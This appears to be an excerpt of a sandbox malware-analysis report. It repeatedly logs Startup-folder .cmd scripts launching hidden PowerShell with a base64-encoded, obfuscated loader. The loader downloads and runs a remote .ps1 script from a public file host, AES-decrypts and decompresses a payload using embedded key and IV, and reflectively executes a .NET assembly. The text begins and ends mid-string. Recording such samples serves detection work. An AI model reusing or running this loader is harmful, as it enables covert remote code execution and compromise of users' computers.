ZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NF